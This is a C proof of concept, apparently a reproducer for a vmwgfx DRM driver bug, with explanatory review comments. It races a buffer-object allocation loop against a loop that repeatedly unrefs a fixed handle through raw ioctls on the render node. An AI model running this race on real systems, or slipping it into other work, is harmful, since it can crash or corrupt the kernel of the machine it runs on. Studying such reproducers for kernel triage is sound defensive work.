vmw.c
#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <drm/drm.h>
/* Descriptor for the DRM render node; stays -1 until main() opens the device. */
int dri_fd = -1;

/*
 * Not read or written by any function in this file.  The initialiser -1
 * converts to 0xFFFFFFFF because __u32 is unsigned.
 */
__u32 handle = (__u32)-1;
/*
 * Request half of the argument passed to the buffer-object allocation ioctl.
 *
 * This is a local re-declaration rather than an include of the driver's UAPI
 * header, so its layout can silently drift from what the running kernel
 * expects -- NOTE(review): confirm against <drm/vmwgfx_drm.h> on the target.
 */
struct drm_vmw_alloc_bo_req {
    __u32 size;   /* requested buffer size; trigger() asks for 0x100 (presumably bytes) */
    __u32 pad64;  /* explicit padding; zeroed by the memset() in trigger() */
};
/*
 * Reply half of the buffer-object allocation ioctl argument.
 *
 * The struct is 24 (0x18) bytes, which is the argument size encoded in the
 * request number 0xC0186441 used by trigger().  Only `handle` is read by the
 * code in this file; the meaning of the other fields is taken from their
 * names -- NOTE(review): confirm against <drm/vmwgfx_drm.h>.
 */
struct drm_vmw_bo_rep {
    __u64 map_handle;      /* not used in this file */
    __u32 handle;          /* handle of the new buffer object; printed by trigger() */
    __u32 cur_gmr_id;      /* not used in this file */
    __u32 cur_gmr_offset;  /* not used in this file */
    __u32 pad64;           /* explicit padding */
};
/*
 * In/out argument of the buffer-object allocation ioctl: the caller fills
 * `req`, and trigger() reads the result back through `rep` after the call.
 * Both members overlay the same storage, so `req` must be rewritten before
 * every call.
 */
union drm_vmw_alloc_bo_arg {
    struct drm_vmw_alloc_bo_req req;  /* written by the caller before ioctl() */
    struct drm_vmw_bo_rep rep;        /* read by the caller after ioctl() */
};
/*
 * Argument layout for dropping a buffer-object handle (8 bytes: handle plus
 * padding).  Declared here but not referenced by any function in this file;
 * gem_close() passes a struct drm_gem_close to its ioctl instead.
 */
struct drm_vmw_unref_dmabuf_arg {
    __u32 handle;  /* handle to release */
    __u32 pad64;   /* explicit padding */
};
/*
 * Allocation side of the reproducer: asks the driver for a new 0x100-sized
 * buffer object over and over, printing each handle it gets back.
 *
 * The request number 0xC0186441 decodes (Linux _IOC layout) to a read/write
 * ioctl of type 'd' (0x64), command 0x41, with a 0x18-byte argument -- the
 * size of union drm_vmw_alloc_bo_arg.  It is hard-coded rather than taken
 * from a header, so it is only valid while the kernel keeps that numbering.
 *
 * Nothing in this function releases the handles it creates.  The loop ends
 * only when the ioctl fails, in which case the whole process exits with
 * status -1.
 */
void trigger(void)
{
    const unsigned long alloc_bo_request = 0xC0186441UL;
    union drm_vmw_alloc_bo_arg arg;

    for (;;) {
        /* req and rep share storage, so rebuild the request on every pass. */
        memset(&arg, 0, sizeof(arg));
        arg.req.size = 0x100;

        if (ioctl(dri_fd, alloc_bo_request, &arg) != 0) {
            printf("[*] Failed\n");
            exit(-1);
        }

        printf("[*] created, Handle %u\n", arg.rep.handle);
        usleep(100); /* 100 microseconds between allocations */
    }
}
/*
 * Release side of the reproducer: issues the handle-unref ioctl on the fixed
 * handle value 10 in an endless loop and ignores the result.  It never
 * returns.
 *
 * 0x40086442 decodes (Linux _IOC layout) to a write-only ioctl of type 'd'
 * (0x64), command 0x42, with an 8-byte argument; the original author's
 * commented-out debug line labels it DRM_VMW_UNREF_DMABUF.  An earlier
 * variant, also left as a comment, called DRM_IOCTL_GEM_CLOSE instead.
 *
 * NOTE(review): run alongside trigger(), this presumably stresses the
 * driver's handle lookup/release path while handles are being created; the
 * page does not state which kernel-side condition it targets.  For triage, a
 * KASAN-enabled kernel in a disposable VM turns any object-lifetime bug into
 * a report instead of silent memory corruption.
 */
void gem_close()
{
    const unsigned long unref_request = 0x40086442UL;
    struct drm_gem_close arg = { .handle = 10 };

    for (;;) {
        /* Outcome deliberately ignored: most calls are expected to fail. */
        (void)ioctl(dri_fd, unref_request, &arg);
    }
}
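/*
 * pthread start routine that runs trigger().
 *
 * trigger() has type void (*)(void), which is not the void *(*)(void *) that
 * pthread_create() requires; calling it through a mismatched function
 * pointer is undefined behaviour, so it is wrapped here.  trigger() only
 * leaves by calling exit(), so the return statement is a formality.
 */
static void *trigger_thread(void *unused)
{
    (void)unused;
    trigger();
    return NULL;
}

/*
 * Opens the DRM render node, starts the allocation loop (trigger) on a
 * second thread and runs the unref loop (gem_close) on the main thread.
 *
 * Returns EXIT_FAILURE if the device cannot be opened or the thread cannot
 * be started.  Otherwise it does not return normally: gem_close() loops
 * forever and the process ends when trigger() calls exit().
 */
int main(void)
{
    pthread_t tid1;
    int rc;

    dri_fd = open("/dev/dri/renderD128", O_RDWR);
    if (dri_fd == -1) {
        /* The original used a bare `return;`, which is invalid in a
         * function returning int and left the exit status undefined. */
        perror("[*] open /dev/dri/renderD128");
        return EXIT_FAILURE;
    }

    /* pthread_create() reports errors through its return value, not errno,
     * so perror() would print an unrelated message. */
    rc = pthread_create(&tid1, NULL, trigger_thread, NULL);
    if (rc != 0) {
        fprintf(stderr, "[*] thread_create tid1: %s\n", strerror(rc));
        /* Without the allocation thread the unref loop has nothing to
         * run against, so stop instead of spinning forever. */
        close(dri_fd);
        return EXIT_FAILURE;
    }

    gem_close();
    return 0; /* not reached: gem_close() never returns */
}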